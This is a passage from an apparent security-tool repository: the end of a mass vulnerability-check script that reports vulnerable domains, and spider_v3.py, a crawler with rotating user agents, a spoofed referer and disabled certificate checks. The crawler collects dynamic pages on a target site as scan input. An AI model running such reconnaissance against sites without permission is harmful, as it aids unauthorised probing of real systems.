url in url.txt') 51 | parser.add_argument('-u',metavar='Url',type=str,help='Put a Web url') 52 | 53 | if len(sys.argv) == 1: 54 | sys.argv.append('-h') 55 | args = parser.parse_args() 56 | if args.u is None: 57 | for url in open(args.f) : 58 | check_vul(url.strip()) 59 | else: 60 | check_vul(args.u) 61 | if vuldomain.strip() != '': 62 | sendresult(vuldomain) 63 | -------------------------------------------------------------------------------- /spider_v3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 18/4/14 上午2:07 4 | # @Author : SecPlus 5 | # @Site : www.SecPlus.org 6 | # @Email : TideSecPlus@gmail.com 7 | 8 | # 2018.04.14 结合wdscan和其他爬虫,相对比较完善的spider 9 | 10 | import random 11 | import urllib2,re,requests 12 | import time,os 13 | 14 | import sys 15 | 16 | 17 | def url_protocol(url): 18 | domain = re.findall(r'.*(?=://)', url) 19 | if domain: 20 | return domain[0] 21 | else: 22 | return url 23 | 24 | def same_url(urlprotocol,url): 25 | url = url.replace(urlprotocol + '://', '') 26 | if re.findall(r'^www', url) == []: 27 | sameurl = 'www.' + url 28 | if sameurl.find('/') != -1: 29 | sameurl = re.findall(r'(?<=www.).*?(?=/)', sameurl)[0] 30 | else: 31 | sameurl = sameurl + '/' 32 | sameurl = re.findall(r'(?<=www.).*?(?=/)', sameurl)[0] 33 | else: 34 | if url.find('/') != -1: 35 | sameurl = 'www.' + re.findall(r'(?<=www.).*?(?=/)', url)[0] 36 | else: 37 | sameurl = url + '/' 38 | sameurl = 'www.' 
+ re.findall(r'(?<=www.).*?(?=/)', sameurl)[0] 39 | print('the domain is:' + sameurl) 40 | return sameurl 41 | 42 | def requests_headers(): 43 | ''' 44 | Random UA for every requests && Use cookie to scan 45 | ''' 46 | user_agent = ['Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0', 47 | 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0', 48 | 'Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre', 49 | 'Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60','Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr)', 50 | 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14', 51 | 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36', 52 | 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 53 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)', 54 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 55 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5'] 56 | UA = random.choice(user_agent) 57 | headers = { 58 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 59 | 'User-Agent':UA,'Upgrade-Insecure-Requests':'1','Connection':'keep-alive','Cache-Control':'max-age=0', 60 | 'Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8', 61 | "Referer": "http://www.baidu.com/link?url=www.so.com&url=www.soso.com&&url=www.sogou.com"} 62 | return headers 63 | 64 | 65 | class linkQuence: 66 | def __init__(self): 67 | self.visited = [] #已访问过的url初始化列表 68 | self.unvisited = [] #未访问过的url初始化列表 69 | self.external_url=[] #外部链接 70 | 71 | def getVisitedUrl(self): #获取已访问过的url 72 | return self.visited 73 | def getUnvisitedUrl(self): #获取未访问过的url 74 | return self.unvisited 75 | def getExternal_link(self): 76 | return self.external_url #获取外部链接地址 77 | def addVisitedUrl(self,url): #添加已访问过的url 78 | return self.visited.append(url) 79 | def addUnvisitedUrl(self,url): #添加未访问过的url 80 | if url != '' and url not in self.visited and url not in self.unvisited: 81 | return self.unvisited.insert(0,url) 82 | def addExternalUrl(self,url): #添加外部链接列表 83 | if url!='' and url not in self.external_url: 84 | return self.external_url.insert(0,url) 85 | 86 | def removeVisited(self,url): 87 | return self.visited.remove(url) 88 | def popUnvisitedUrl(self): #从未访问过的url中取出一个url 89 | try: #pop动作会报错终止操作,所以需要使用try进行异常处理 90 | return self.unvisited.pop() 91 | except: 92 | return None 93 | def unvisitedUrlEmpty(self): #判断未访问过列表是不是为空 94 | return len(self.unvisited) == 0 95 | 96 | class Spider(): 97 | ''' 98 | 真正的爬取程序 99 | ''' 100 | def __init__(self,url,domain_url,urlprotocol): 101 | self.linkQuence = linkQuence() #引入linkQuence类 102 | self.linkQuence.addUnvisitedUrl(url) #并将需要爬取的url添加进linkQuence对列中 103 | self.current_deepth = 1 #设置爬取的深度 104 | self.domain_url = domain_url 105 | self.urlprotocol = urlprotocol 106 | 107 | def getPageLinks(self,url): 108 | ''' 109 | 获取页面中的所有链接 110 | ''' 111 | try: 112 | headers = requests_headers() 113 | content = requests.get(url, timeout=5, headers=headers, verify=False).text.encode('utf-8') 114 | links = [] 115 | tags = ['a', 'A', 'link', 'script', 'area', 'iframe', 
'form'] # img 116 | tos = ['href', 'src', 'action'] 117 | if url[-1:] == '/': 118 | url = url[:-1] 119 | try: 120 | for tag in tags: 121 | for to in tos: 122 | link1 = re.findall(r'<%s.*?%s="(.*?)"' % (tag, to), str(content)) 123 | link2 = re.findall(r'<%s.*?%s=\'(.*?)\'' % (tag, to), str(content)) 124 | for i in link1: 125 | links.append(i) 126 | 127 | for i in link2: 128 | if i not in links: 129 | links.append(i) 130 | 131 | except Exception, e: 132 | print e 133 | print '[!] Get link error' 134 | pass 135 | return links 136 | except: 137 | return [] 138 | def getPageLinks_bak(self,url): 139 | ''' 140 | 获取页面中的所有链接 141 | ''' 142 | try: 143 | 144 | # pageSource=urllib2.urlopen(url).read() 145 | headers = requests_headers() 146 | time.sleep(0.5) 147 | pageSource = requests.get(url, timeout=5, headers=headers).text.encode('utf-8') 148 | pageLinks = re.findall(r'(?<=href=\").*?(?=\")|(?<=href=\').*?(?=\')', pageSource) 149 | # print pageLinks 150 | except: 151 | # print ('open url error') 152 | return [] 153 | return pageLinks 154 | 155 | def processUrl(self,url): 156 | ''' 157 | 判断正确的链接及处理相对路径为正确的完整url 158 | :return: 159 | ''' 160 | true_url = [] 161 | in_link = [] 162 | excludeext = ['.zip', '.rar', '.pdf', '.doc', '.xls', '.jpg', '.mp3', '.mp4','.png', '.ico', '.gif','.svg', '.jpeg','.mpg', '.wmv', '.wma','mailto','javascript','data:image'] 163 | for suburl in self.getPageLinks(url): 164 | exit_flag = 0 165 | for ext in excludeext: 166 | if ext in suburl: 167 | print "break:" + suburl 168 | exit_flag = 1 169 | break 170 | if exit_flag == 0: 171 | if re.findall(r'/', suburl): 172 | if re.findall(r':', suburl): 173 | true_url.append(suburl) 174 | else: 175 | true_url.append(self.urlprotocol + '://' + self.domain_url + '/' + suburl) 176 | else: 177 | true_url.append(self.urlprotocol + '://' + self.domain_url + '/' + suburl) 178 | 179 | for suburl in true_url: 180 | print('from:' + url + ' get suburl:' + suburl) 181 | 182 | return true_url 183 | 184 | def sameTargetUrl(self,url): 185 | same_target_url = [] 186 | for suburl in self.processUrl(url): 187 | if re.findall(self.domain_url,suburl): 188 | same_target_url.append(suburl) 189 | else: 190 | self.linkQuence.addExternalUrl(suburl) 191 | return same_target_url 192 | 193 | def unrepectUrl(self,url): 194 | ''' 195 | 删除重复url 196 | ''' 197 | unrepect_url = [] 198 | for suburl in self.sameTargetUrl(url): 199 | if suburl not in unrepect_url: 200 | unrepect_url.append(suburl) 201 | return unrepect_url 202 | 203 | def crawler(self,crawl_deepth=1): 204 | ''' 205 | 正式的爬取,并依据深度进行爬取层级控制 206 | ''' 207 | self.current_deepth=0 208 | print "current_deepth:", self.current_deepth 209 | while self.current_deepth < crawl_deepth: 210 | if self.linkQuence.unvisitedUrlEmpty():break 211 | links=[] 212 | while not self.linkQuence.unvisitedUrlEmpty(): 213 | visitedUrl = self.linkQuence.popUnvisitedUrl() 214 | if visitedUrl is None or visitedUrl == '': 215 | continue 216 | print("#"*30 + visitedUrl +" :begin"+"#"*30) 217 | for sublurl in self.unrepectUrl(visitedUrl): 218 | links.append(sublurl) 219 | # links = self.unrepectUrl(visitedUrl) 220 | self.linkQuence.addVisitedUrl(visitedUrl) 221 | print("#"*30 + visitedUrl +" :end"+"#"*30 +'\n') 222 | for link in links: 223 | self.linkQuence.addUnvisitedUrl(link) 224 | self.current_deepth += 1 225 | # print(self.linkQuence.visited) 226 | # print (self.linkQuence.unvisited) 227 | urllist=[] 228 | urllist.append("#" * 30 + ' VisitedUrl ' + "#" * 30) 229 | for suburl in self.linkQuence.getVisitedUrl(): 230 | 
urllist.append(suburl) 231 | urllist.append('\n'+"#" * 30 + ' UnVisitedUrl ' + "#" * 30) 232 | for suburl in self.linkQuence.getUnvisitedUrl(): 233 | urllist.append(suburl) 234 | urllist.append('\n'+"#" * 30 + ' External_link ' + "#" * 30) 235 | for sublurl in self.linkQuence.getExternal_link(): 236 | urllist.append(sublurl) 237 | urllist.append('\n'+"#" * 30 + ' Active_link ' + "#" * 30) 238 | actives = ['?', '.asp', '.jsp', '.php', '.aspx', '.do', '.action'] 239 | active_urls = [] 240 | for sublurl in urllist: 241 | for active in actives: 242 | if active in sublurl: 243 | active_urls.append(sublurl) 244 | break 245 | for active_url in active_urls: 246 | urllist.append(active_url) 247 | return urllist 248 | def writelog(log,urllist): 249 | filename=log 250 | outfile=open(filename,'w') 251 | for suburl in urllist: 252 | outfile.write(suburl+'\n') 253 | outfile.close() 254 | 255 | def urlspider(rooturl,crawl_deepth=3): 256 | # ext_link = [] 257 | urlprotocol = url_protocol(url) 258 | domain_url = same_url(urlprotocol,url) 259 | print "domain_url:"+domain_url 260 | spider = Spider(url,domain_url,urlprotocol) 261 | urllist=spider.crawler(crawl_deepth) 262 | writelog(domain_url,urllist) 263 | print '-' * 20 + url + '-' * 20 264 | for sublurl in urllist: 265 | print sublurl 266 | print '\n' + 'Result record in:' + domain_url + '.txt' 267 | 268 | def SRC_spider(url, log,crawl_deepth=3): 269 | # url = 'http://2014.liaocheng.gov.cn' 270 | 271 | urlprotocol = url_protocol(url) 272 | domain_url = same_url(urlprotocol, url) 273 | print "domain_url:" + domain_url 274 | spider = Spider(url,domain_url,urlprotocol) 275 | urllist = spider.crawler(crawl_deepth) 276 | writelog(log, urllist) 277 | print '-' * 20 + url + '-' * 20 278 | # for sublurl in urllist: 279 | # print sublurl 280 | print '\n' + 'Result record in:' + log 281 | 282 | 283 | if __name__ == '__main__': 284 | url = 'http://www.wuhubtv.com' 285 | os.system("mkdir sp_result") 286 | craw_deepth =5 287 | usage = ''' 288 | python spider_v3.py 1.txt 5 --> 1.txt为待爬取的网站地址,5为爬取深度,可以不设,默认为5。 289 | ''' 290 | try: 291 | if len(sys.argv) ==2: 292 | url = sys.argv[1] 293 | craw_deepth = 5 294 | elif len(sys.argv) ==3: 295 | url = sys.argv[1] 296 | craw_deepth = int(sys.argv[2]) 297 | else: 298 | print usage 299 | exit(0) 300 | with open (sys.argv[1]) as f: 301 | for a in f: 302 | url = a.strip() 303 | print url 304 | if url.find("http") >= 0: 305 | pass 306 | else: 307 | url = "http://"+url 308 | urlprotocol = url_protocol(url) 309 | domain_url = same_url(urlprotocol, url) 310 | print "domain_url:" + domain_url 311 | spider = Spider(url, domain_url, urlprotocol) 312 | urllist = spider.crawler(craw_deepth) 313 | writelog("./sp_result/"+domain_url+'.txt', urllist) 314 | # print urllist 315 | print '-' * 20 + url + '-' * 20 316 | for sublurl in urllist: 317 | print sublurl 318 | print len(urllist) 319 | print '\n' + 'Result record in:' + domain_url + '.txt' 320 | except: 321 | pass 322 | 323 | --------------------------------------------------------------------------------
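spider_v3.py above targets Python 2 (urllib2, print statements, `except Exception, e`). For reference, a minimal Python 3 sketch of its core step — pulling href/src/action values out of a fetched page with essentially the same tag/attribute regular expressions — is given below; the function name and example URL are illustrative and not part of the repository:

```
import re
import requests
import warnings
warnings.filterwarnings("ignore")

def extract_links(url, timeout=5):
    # fetch the page and collect attribute values the way Spider.getPageLinks does
    headers = {'User-Agent': 'Mozilla/5.0'}
    content = requests.get(url, timeout=timeout, headers=headers, verify=False).text
    tags = ['a', 'A', 'link', 'script', 'area', 'iframe', 'form']
    attrs = ['href', 'src', 'action']
    links = []
    for tag in tags:
        for attr in attrs:
            # match double- and single-quoted attribute values
            links += re.findall(r'<%s[^>]*?%s="(.*?)"' % (tag, attr), content)
            links += re.findall(r"<%s[^>]*?%s='(.*?)'" % (tag, attr), content)
    # de-duplicate while keeping first-seen order
    return list(dict.fromkeys(links))

if __name__ == '__main__':
    for link in extract_links('http://www.example.com'):
        print(link)
```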